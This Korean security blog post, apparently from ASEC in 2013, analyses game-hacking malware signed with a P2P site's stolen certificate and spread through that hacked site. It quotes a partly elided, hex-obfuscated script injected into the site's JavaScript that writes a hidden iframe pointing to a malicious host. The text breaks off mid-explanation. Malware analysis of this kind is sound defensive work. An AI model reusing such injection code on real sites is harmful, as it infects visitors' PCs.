국내P2P 사이트의 인증서를 악용한 온라인 게임핵 Posted By ASEC , 2013년 6월 4일 악성코드가 탈취한 인증서를 사용하여 자신을 서명한 사례는 국내외에서 간헐적으로 발생해 왔고 언론을 통해 보도 된 바 있다. 이번에 발견된 악성코드는 국내 해킹된 웹 사이트를 통해 유포가 됐으며, PC를 감염시키는 과정에서 생성된 파일들 중에 하나가 특정 P2P 사이트의 인증서로 서명되어 있음을 발견하였다. [그림 1] 국내 P2P 사이트의 인증서로 서명된 악성코드 위 [그림 1]이 최종으로 취약점(JAVA, IE, Flash Player)이 존재하는 PC로 다운로드 되어 실행되기까지의 과정을 정리해 보면 아래와 같다. 최초 악성 스크립트 링크가 삽입된 페이지 역시 P2P 웹 사이트였으며, makePCookie.js 파일에 Hex 문자열로 난독화된 형태의 악성 스크립트 링크가 존재 하였다. http://on****.co.kr/js/makePCookie.js • 난독화된 악성 스크립트 링크: window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](“x3cx69x66x72x61x6dx65 x77x69x64x74x68x3dx27x31x30x30x27x68x65x69x67x68x74x3dx27x30 x27x73x72x63x3dx27x68x74x74x70x3ax2fx2fx73x6ex73x6fx66x74x2ex64 x69//—중간생략—//x2ex68x74x6dx6cx27x3ex3cx2fx69x66x72x61x6dx65x3e”); • 난독화 해제 후 코드: 난독화된 코드가 IE에 의해서 해석되면서 또 다른 특정 사이트로부터 악성 스크립트인 css.html을 다운로드 한…
